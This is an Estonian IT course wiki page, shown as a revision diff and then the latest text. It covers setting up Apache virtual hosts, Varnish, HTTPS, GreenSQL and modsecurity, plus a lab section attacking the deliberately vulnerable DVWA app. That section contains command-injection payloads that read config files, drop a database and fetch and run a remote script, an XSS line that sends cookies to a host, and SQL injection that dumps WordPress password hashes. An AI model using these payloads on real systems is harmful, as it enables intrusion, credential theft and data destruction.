Virtualhost apache2 näitel: Difference between revisions

From ICO wiki
Jump to navigationJump to search
No edit summary
 
(42 intermediate revisions by 5 users not shown)
Line 1: Line 1:
[[Category:IT infrastruktuuri teenused]]
=Apache seadistamine=
<pre>
<pre>
/etc/hosts
/etc/hosts
Line 23: Line 26:
mkdir -p /var/www/sales.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz
cp /var/www/index.html /var/www/www.planet.zz
cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
        address 192.168.56.201
        netmask 255.255.255.0
EOL
ifup eth1:0
cp /var/www/index.html /var/www/sales.planet.zz
cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/www.planet.zz/index.html
Line 38: Line 53:


</source>
</source>
=WordPress tuning=
<source lang="apache">
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName wp.planet.zz
        DocumentRoot /var/www/wordpress
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/wordpress>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride All
                Order allow,deny
                allow from all
        </Directory>
        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>
        ErrorLog ${APACHE_LOG_DIR}/error.log
        # Possible values include: debug, info, notice, warn, error, crit,
        # alert, emerg.
        LogLevel warn
        CustomLog ${APACHE_LOG_DIR}/access.log combined
    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>
</VirtualHost>
</source>
Pange tähele muudetud Directory seadeid.
<Directory /var/www/wordpress>
AllowOverride All
<source lang="bash">
echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite
a2enmod headers
a2enmod expires
</source>
Selle rea võib lisada alglaadimisel käivitatavasse faili ''/etc/rc.local''
Paigaldage oma valitud cace plugin wordpressile.


=Varnish=
=Varnish=
Line 53: Line 134:
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i
#testimiseks
grep ':80' *
service apache2 restart
service apache2 restart
#testimiseks
netstat -lntp
netstat -lntp
#installeerime varnish cache
apt-get install varnish
apt-get install varnish
vim /etc/default/varnish
vim /etc/default/varnish
Line 84: Line 174:
</source>
</source>


=DVWA ründed=
Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:
==cmd exec==
 
<source lang="bash">
cd /etc/apache2/sites-available/
</source>
Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.
 
<source lang="bash">
nano wp
</source>
 
Sinna tuleb kirjutada CustomLog'i rea asemele
 
<source lang="bash">
CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined
</source>
 
Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta
 
<source lang="bash">
cd /etc/apache2/conf.d/
</source>
 
Tee sinna uus fail nimega näiteks '''varnishlog.conf'''
<source lang="bash">
nano varnishlog.conf
</source>
 
Kirjuta sinna see rida
<source lang="bash">
LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined
</source>
 
Tee apache2 teenusele restart
<source lang="bash">
<source lang="bash">
8.8.8.8; ls -l
service apache2 restart
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//'  ../../../../wordpress/wp-config.php
</source>
</source>


=DVWA ründed=
=HTTPS konfigureerimine=
=HTTPS konfigureerimine=


Line 124: Line 243:
openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req
openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req


<pre>
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:EE
State or Province Name (full name) [Some-State]:Harjumaa
Locality Name (eg, city) []:Tallinn
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
</pre>


sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem
sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem
Line 159: Line 300:


=DVWA ründed=
=DVWA ründed=
==cmd exec==
<source lang="bash">
<source lang="bash">
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
</source>
</source>
<source lang="bash">
8.8.8.8; ls -l
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//'  ../../../../wordpress/wp-config.php
</source>
Loon faili kala /var/tmp kataloogi
<source lang="bash">
8.8.8.8; touch /var/tmp/kala.txt
</source>
Ning kontrollin kas fail loodi
<source lang="bash">
8.8.8.8; ls /var/tmp/
</source>
kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):
<source lang="bash">
8.8.8.8;mysqladmin DROP dvwa -y;
</source>
kuvada failide infot:
<source lang="bash">
8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz
</source>
skripti laadimine serverisse ning sellele käivitusbiti andmine:
<source lang="bash">
8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh
</source>
Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
<source lang="bash">
; grep session.cookie_httponly /etc/php5/apache2/php.ini
</source>
Väljund:
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:
'''session.cookie_httponly = 1'''
* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))
'''session.cookie_httponly = 0'''
==XSS==
<source lang="javascript">
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
</source>
==veel XSSi==
<pre>
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
</pre>
==SQLi==
<source lang="sql">
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --
2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --
3' union  select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --
4' union select user_login,user_pass from wp.wp_users; #
3' union  select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #
</source>
=GreenSQL firewall=
<source lang="bash">
wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb
dpkg -i greensql-fw_1.3.0_amd64.deb
apt-get install -f
#Modify existing virtualhost or create new virtualhost.
cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql
cd greensql
chmod 0777 templates_c
</source>
Kasutajanimi veebiliidesel on '''admin''' ja parool '''pwd'''.
Muutke DVWA config failis andmebaasi asukohta:
<pre>
$_DVWA[ 'db_server' ] = '127.0.0.1:3305';
</pre>
<source lang="bash">
#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start
</source>
=modsecurity=
==installeerimine==
<source lang="bash">
apt-get install libapache2-mod-security2
</source>
Muutke faili '''/etc/apache2/mods-available/security2.conf'''
<source lang="apache">
<IfModule security2_module>
        # Default Debian dir for modsecurity's persistent data
        SecDataDir /var/cache/modsecurity
        # Include all the *.conf files in /etc/modsecurity.
        # Keeping your local configuration in that directory
        # will allow for an easy upgrade of THIS file and
        # make your life easier
        IncludeOptional /etc/modsecurity/*.conf
        IncludeOptional /usr/share/modsecurity-crs/base_rules/*.conf
        IncludeOptional /usr/share/modsecurity-crs/activated_rules/*.conf
        SecRuleEngine On
</IfModule>
</source>
Teeme nimelingi modsecurity reeglite seadistamiseks:
<source lang="bash">
ln -s /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf /etc/modsecurity/
</source>
=Apache2 tweaks=
<source lang="apache">
ServerSignature Off
ServerTokens Prod
</source>
http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3
== Apache testimine ==
Lisaks ab'le on olemas ka teisi utiliite:
1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi <br>
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php <br>
3. OpenWebLoad - http://openwebload.sourceforge.net/#download <br>
4. Allmon - https://code.google.com/p/allmon/downloads/list <br>
5. CLIF - http://clif.ow2.org/download/index.html <br>
6. curl-loader - http://sourceforge.net/projects/curl-loader/files/ <br>
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/ <br>
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/ <br>
9. FWPTT - http://sourceforge.net/projects/fwptt/files/ <br>
10. http_load - http://www.acme.com/software/http_load/ <br>

Latest revision as of 12:19, 4 May 2015

Apache seadistamine

/etc/hosts

192.168.56.101  www.planet.zz
192.168.56.101  sales.planet.zz
ping www.planet.zz

ping sales.planet.zz    


apt-get update     
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz


cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
        address 192.168.56.201
        netmask 255.255.255.0

EOL

ifup eth1:0

cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz 
vim sales.planet.zz 

a2ensite www.planet.zz
a2ensite sales.planet.zz 
service apache2 reload

WordPress tuning

<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName wp.planet.zz
        DocumentRoot /var/www/wordpress
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/wordpress>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride All
                Order allow,deny
                allow from all
        </Directory>

        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>

        ErrorLog ${APACHE_LOG_DIR}/error.log

        # Possible values include: debug, info, notice, warn, error, crit,
        # alert, emerg.
        LogLevel warn

        CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>

</VirtualHost>

Pange tähele muudetud Directory seadeid. <Directory /var/www/wordpress> AllowOverride All


echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite 
a2enmod headers 
a2enmod expires

Selle rea võib lisada alglaadimisel käivitatavasse faili /etc/rc.local


Paigaldage oma valitud cace plugin wordpressile.

Varnish

Esmaselt tõstame apache2 porti 8080

/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i

#testimiseks
grep ':80' *


service apache2 restart

#testimiseks
netstat -lntp

#installeerime varnish cache
apt-get install varnish
vim /etc/default/varnish
DAEMON_OPTS="-a :80 \
             -T localhost:6082 \
             -f /etc/varnish/default.vcl \
             -S /etc/varnish/secret \
             -s malloc,256m"

Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine

sub vcl_recv {

  # Add a unique header containing the client address

  remove req.http.X-Forwarded-For;

  set    req.http.X-Forwarded-For = client.ip;

  # [...]

}

service varnish restart

Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:

cd /etc/apache2/sites-available/

Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.

nano wp

Sinna tuleb kirjutada CustomLog'i rea asemele

CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined

Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta

cd /etc/apache2/conf.d/

Tee sinna uus fail nimega näiteks varnishlog.conf

nano varnishlog.conf

Kirjuta sinna see rida

LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined

Tee apache2 teenusele restart

service apache2 restart

DVWA ründed

HTTPS konfigureerimine

ssh-keygen


Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key

Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
|            .    |
|           + .   |
|          o +    |
|           * o   |
|        S + O    |
|       ..+ + + . |
|       ...o o =  |
|        o+   o . |
|       .o.    E  |
+-----------------+

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req

You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:EE
State or Province Name (full name) [Some-State]:Harjumaa
Locality Name (eg, city) []:Tallinn
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet 
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

ServerName      www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile    /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key


a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

ID kaart

ID kaardiga autentimine Apache2 veebiserveriga


DVWA ründed

cmd exec

8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php


8.8.8.8; ls -l 
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//'  ../../../../wordpress/wp-config.php


Loon faili kala /var/tmp kataloogi

8.8.8.8; touch /var/tmp/kala.txt

Ning kontrollin kas fail loodi

8.8.8.8; ls /var/tmp/

kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):

8.8.8.8;mysqladmin DROP dvwa -y;

kuvada failide infot:

8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz

skripti laadimine serverisse ning sellele käivitusbiti andmine:

8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh

Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)

; grep session.cookie_httponly /etc/php5/apache2/php.ini

Väljund:

  • kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

session.cookie_httponly = 1

  • kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

session.cookie_httponly = 0

XSS

<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>

veel XSSi

%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E

SQLi

#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --


2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --


3' union  select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --

4' union select user_login,user_pass from wp.wp_users; #

3' union  select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #

GreenSQL firewall

wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb

dpkg -i greensql-fw_1.3.0_amd64.deb

apt-get install -f

#Modify existing virtualhost or create new virtualhost.

cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql

cd greensql
chmod 0777 templates_c

Kasutajanimi veebiliidesel on admin ja parool pwd.


Muutke DVWA config failis andmebaasi asukohta:

$_DVWA[ 'db_server' ] = '127.0.0.1:3305';


#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start

modsecurity

installeerimine

apt-get install libapache2-mod-security2


Muutke faili /etc/apache2/mods-available/security2.conf

<IfModule security2_module>
        # Default Debian dir for modsecurity's persistent data
        SecDataDir /var/cache/modsecurity

        # Include all the *.conf files in /etc/modsecurity.
        # Keeping your local configuration in that directory
        # will allow for an easy upgrade of THIS file and
        # make your life easier
        IncludeOptional /etc/modsecurity/*.conf
        IncludeOptional /usr/share/modsecurity-crs/base_rules/*.conf
        IncludeOptional /usr/share/modsecurity-crs/activated_rules/*.conf

        SecRuleEngine On


</IfModule>

Teeme nimelingi modsecurity reeglite seadistamiseks:

ln -s /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf /etc/modsecurity/

Apache2 tweaks

ServerSignature Off
ServerTokens Prod


http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3


Apache testimine

Lisaks ab'le on olemas ka teisi utiliite:


1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php
3. OpenWebLoad - http://openwebload.sourceforge.net/#download
4. Allmon - https://code.google.com/p/allmon/downloads/list
5. CLIF - http://clif.ow2.org/download/index.html
6. curl-loader - http://sourceforge.net/projects/curl-loader/files/
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/
9. FWPTT - http://sourceforge.net/projects/fwptt/files/
10. http_load - http://www.acme.com/software/http_load/